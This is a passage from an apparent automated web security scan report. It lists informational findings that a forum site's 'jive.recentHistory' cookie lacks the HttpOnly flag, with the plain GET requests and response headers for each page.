Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033393b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b31342c323036333b31342c323036343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=67754 t=1313157070067212
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.26. https://www.x.com/community/ppx/global/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/ca

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/ca HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034303b31342c323133313b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=100595 t=1313157070639699
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.27. https://www.x.com/community/ppx/global/cn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/cn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/cn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133313b31342c323030343b31342c323033393b31342c323034303b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=70307 t=1313157070898066
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.28. https://www.x.com/community/ppx/global/de

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/de

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/de HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034323b31342c323133313b31342c323034313b31342c323034303b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:12 GMT; Path=/
Vary: User-Agent
JP: D=91052 t=1313157072186357
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...